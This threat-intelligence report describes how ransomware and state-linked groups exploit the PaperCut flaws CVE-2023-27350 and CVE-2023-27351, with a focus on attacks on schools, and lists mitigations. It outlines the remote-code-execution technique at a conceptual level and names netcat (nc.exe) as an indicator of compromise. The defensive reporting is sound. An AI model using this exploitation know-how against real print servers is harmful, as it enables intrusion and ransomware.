- Table of contents
Coral TayarShare on LinkedIn
Security Researcher at Cyberint
Table of contents
June Update: The Escalation of the PaperCut Vulnerability Campaign
Over the past two months, the Cyberint research team has witnessed an extensive campaign in which threat actors are actively exploiting the recently discovered vulnerability in the PaperCut print management platform. The Cyberint research team has identified a significant trend in relation to these recent attacks and associated incidents linked to this vulnerability.
Multiple threat actors are specifically focusing their efforts on targeting the education sector, resulting in a significant surge in attacks within this industry, with the occurrence rate escalating by several hundred percent in recent times.
This report provides a comprehensive overview of two vulnerabilities found in the PaperCut software: CVE-2023-27350 and CVE-2023-27351. It delves into the potential consequences of these vulnerabilities and highlights the threat actors who have taken advantage of them, including notable ransomware groups such as LockBit, Bl00dy, and Clop. Furthermore, the report includes recommendations for mitigation that affected organizations can adopt to effectively address these vulnerabilities.
What Is PaperCut?
PaperCut is a comprehensive print management software that enables organizations to manage their printing environments effectively. It encompasses a variety of features, such as print job tracking, quotas, rules-based printing, and cost accounting. PaperCut supports both on-premise and cloud deployments and is compatible with a wide array of printers and operating systems.
PaperCut offers clients a range of products, including the distinct print management solutions known as PaperCut NG and PaperCut MF. These products are utilized by local governments, large enterprises, healthcare institutions, and educational organizations. PaperCut’s website states that its software has garnered an extensive user base of over 100 million individuals across more than 70,000 organizations worldwide.
The Papercut Vulnerabilities
On March 8th, PaperCut released new versions of their enterprise print management software which encompassed fixes for two vulnerabilities: CVE-2023-27350 and CVE-2023-27351. These vulnerabilities were reported to the company in early January, prompting the necessary fixes to ensure the security of their products.
CVE-2023-27350, which was reported by the Zero Day Initiative, pertains to a critical vulnerability found in both PaperCut MF and NG installations. This flaw can be exploited by an unauthorized attacker to execute arbitrary code with SYSTEM privileges, making it highly impactful.
Due to its severity and ease of exploitation, it has received a CVSS severity score of 9.8 and the highest CVE score on the Argos CVE intel module, reaching -10.
The exploit takes advantage of manipulating the default template printer scripts by introducing malicious entries. By bypassing security sandboxing, the malicious script gains direct access to the Java runtime, enabling the execution of code on the main server.
Although the scripts primarily contain functions intended for future execution, the global scope executes immediately upon saving. This means that a simple alteration of a printer script can be leveraged by a threat actor to execute arbitrary code, leading to Remote Code Execution.
Exploiting the vulnerability in PaperCut could serve as an entry point for further activities within the target network. This could involve unauthorized movement within the network, unauthorized access to sensitive data, manipulation of data, the establishment of persistent backdoors for future access, and even the deployment of ransomware.
PaperCut also raised concerns regarding a similar vulnerability in its software, CVE-2023-27351, with a vulnerability severity rating of 8.2 out of 10. This particular bug enables Threat Actors to retrieve user information stored within PaperCut MF and NG servers belonging to customers.
The compromised data includes usernames, full names, email addresses, department details, and payment card numbers linked to the affected accounts.
Although CVE-2023-27351 has been published alongside CVE-2023-27350 and has also been exploited already, this report will primarily focus on CVE-2023-27350 due to its higher level of criticality and risk.
Papercut Vulnerability Exploitation Timeline
After disclosing CVE-2023-27350, Shodan detected approximately 1,800 publicly exposed PaperCut servers. However, Cyberint’s recent findings indicate evidence of approximately 700 exposed servers as of today.
This CVE is easy to exploit and has already been observed in the wild, associated with ransomware attacks by notorious ransomware groups such as Bl00dy, Clop, and LockBit.
While PaperCut officially acknowledged the active exploitation and issued a notification on April 19, Cyberint found evidence indicating that the exploitation had begun as early as April 13. Notably, most targeted victims belong to the education sector, which comprises a significant portion of PaperCut’s customer base. Below, we will outline the schedule for the sequence of events related to CVE-2023-27350:
Surprising Exploitation Simplicity of the Papercut Vulnerability
As previously mentioned, a simple search on Shodan revealed around 1800 potentially vulnerable PaperCut servers when the vulnerability was initially detected. The ease of finding potential victims is attributed to PaperCut’s front-facing interface, making it susceptible to exploitation even by less sophisticated threat actors.
Moreover, proof-of-concept (POC), demonstrations, and guidance of the vulnerability are very easy to find in the deep and dark web (Figure 2).
In addition, Cyberint identified extensive chatter around this issue (Figure 3) which also led to the conclusion that this vulnerability is fairly easy to exploit.
To date, Cyberint has identified approximately 700 potentially vulnerable PaperCut servers, with 35% of them belonging to the education sector. Despite the critical nature of the vulnerability and its awareness within the cybersecurity community, it appears that many educational institutions have not yet patched and updated their PaperCut systems.
This raises concerns about the security maturity level within the sector, especially considering the ongoing cyber-attacks targeting educational organizations. The educational sector has suffered an increase in ransomware cases in the past six months, partially due to the discovery of this vulnerability.
Even if all education organizations eventually patch the vulnerability, the longer it takes, the more time it provides for threat actors to exploit it. It’s crucial to note that even after patching and updating PaperCut if a system was already infected prior to the patch, a threat actor may have already gained access to sensitive data and systems.
The factors mentioned above, including the simplicity of finding vulnerable victims and exploitability of the vulnerability (Figure 4,5), the presence of valuable and sensitive data in vulnerable systems, and the potentially devastating consequences of its exploitation, collectively attract the attention of all kinds of threat actors.
The Papercut Vulnerability Campaign’s Threat Actors
Among the ransomware and threat actors groups that have exploited this vulnerability, notable examples include LockBit, Bl00dy, Cl0p, MuddyWater, and Phosphorus. These groups stand out for quickly embracing CVEs as part of their attack strategies. They exhibit a remarkable capacity to swiftly integrate POCs (proof-of-concept) exploits into their operations, showcasing their agility and adaptability. This demonstrates their deep understanding of emerging vulnerabilities and their proactive approach to leveraging them for malicious purposes.
In the last six months, the Cyberint research team has observed a surge in attacks targeting the education sector, with specific references to the PaperCut environment in ransomware attacks that happened before the CVE was published. Since December 2022 there has been a 178% increase in ransomware attacks targeting educational institutions. This alarming trend suggests that threat actor groups may have exploited this vulnerability prior to its official disclosure.
The LockBit Ransomware Group initially emerged in September 2019. With the shutdown of the Conti Group, LockBit became the most prominent ransomware group in 2022 and continues to maintain its position as one of the most active groups to date.
Since the beginning of 2023, LockBit recorded over 422 publicly announced cases and over 1700 victims in total, setting their position as a significant threat in the cybersecurity landscape.
LockBit primarily focuses on US and European victims, specifically targeting manufacturing, services, retail, education sectors, and more.
The Cyberint research team was able to find evidence that strongly suggests that the LockBit ransomware group has been actively capitalizing on the vulnerabilities to execute a PowerShell script, ultimately resulting in the deployment of the LockBit ransomware.
Originating in Russia, the Clop ransomware group, also known as Cl0p, emerged in February 2019. It has been actively focusing on a broad range of sectors globally, including retail, transportation, education, manufacturing, automotive, energy, financial, telecommunications, and healthcare.
Clop currently ranks as the second most active ransomware group worldwide in Q1, consistently compromising new victims every week.
Clop ransomware group claims to have initiated the exploitation of PaperCut servers on April 13th. Clop’s primary objective was gaining initial access to corporate networks rather than extracting archived documents from the servers.
Before deploying ransomware, Clop employed remote tools to implant Truebot malware, a known tool used by the gang. Truebot has also been associated with Clop’s mass hack targeting Fortra’s GoAnywhere file transfer tool.
Considering how Clop takes advantage of this vulnerability and looking at previous instances where the group has utilized 0-day exploits like the recent GoAnywhere vulnerability (CVE-2023-0669) and others, Clop has adopted CVEs as their modus operandi. When compared to other ransomware groups, it seems that Clop’s primary focus is exploiting vulnerabilities rather than relying on alternative methods.
The Bl00dy ransomware group initiated its operations in May 2022 and has since targeted well-known organizations across various industries using double extortion techniques.
Bl00dy gang encrypts files on the victim’s machine and adds the “.bl00dy” extension to the encrypted files. The gang creates a ransom note on the compromised system. The group has been observed using Conti’s ransomware modules.
In early May 2023, US cybersecurity and intelligence agencies issued a joint advisory warning of targeted attacks carried out by the Bl00dy Ransomware Gang on the education facilities sector in the country. Bl00dy specifically exploited vulnerable PaperCut servers within the Education Facilities Subsector, exposing them to the internet.
As a result of these attacks, the Bl00dy Ransomware Gang gained unauthorized access to victim networks, leading to data exfiltration and encryption of system files. Bl00dy left ransom notes on compromised systems, demanding payment in exchange for decrypting the encrypted files.
MuddyWater & Phosphorus
MuddyWater is an espionage group operating within Iran’s Ministry of Intelligence and Security (MOIS).
Since at least 2017, MuddyWater has directed its efforts towards various government and private entities across sectors, including telecommunications, local government, defense, oil, and natural gas organizations.
MuddyWater focuses its targeting efforts on victims located in a wide range of regions, including the Middle East, Asia, Africa, Europe, and North America.
Phosphorus, also known as Charming Kitten, is a state-sponsored Iranian threat group that has exhibited significant activity since 2017. The group shares alignment with Iran’s Islamic Revolutionary Guard Corps in terms of targeting strategy. Phosphorus has gained notoriety for using phishing techniques focusing on influential individuals.
Both Iranian groups have joined the ongoing campaign targeting these vulnerabilities. Their exploitations have affected organizations across various sectors and regions, suggesting an opportunistic approach.
MuddyWater has utilized tools from previous campaigns to establish connections with its command-and-control infrastructure.
The potential for significant financial gains and the ability to cause considerable damage to immature organizations that have not implemented sufficient security measures makes PaperCut’s vulnerability highly enticing to exploit. This has resulted in a considerable number of threat actors abusing this vulnerability.
This vulnerability underscores the importance of regularly patching and keeping all platforms up to date. Regardless of how unexpected it may seem that a print management system can have such devastating consequences for organizations, this may be the result of not implementing strong security measures.
Papercut Vulnerability Recommendations & Mitigations
- Immediate patching of the affected versions of PaperCut MF/NG is highly recommended. Upgrade PaperCut to the latest version, specifically versions 20.1.7, 21.2.11, or 22.0.9. It’s important for organizations to be aware that their systems may have been compromised prior to applying the patch, allowing threat actors to gain unauthorized access to sensitive data. Therefore it’s advised to assume compromise and proactively investigate for any signs of suspicious activity related to exploitation attempts.
- If immediate patching of vulnerable PaperCut servers is not feasible, it’s essential to take measures to limit the exposure to potential attacks. One crucial step is to ensure that these servers are not accessible over the Internet. While this measure helps mitigate the risk, it’s important to keep in mind that it’s temporary and patching remains the most effective long-term solution to address the vulnerabilities in PaperCut servers.
- Verify that there is no nc.exe file present in the user’s Downloads folder. If it exists, it may indicate that threat actors have already gained access to the organization’s systems.
- Furthermore, it is crucial to implement various security measures, such as Firewall rules and Intrusion Detection Systems, to enhance the overall security posture of the server running PaperCut.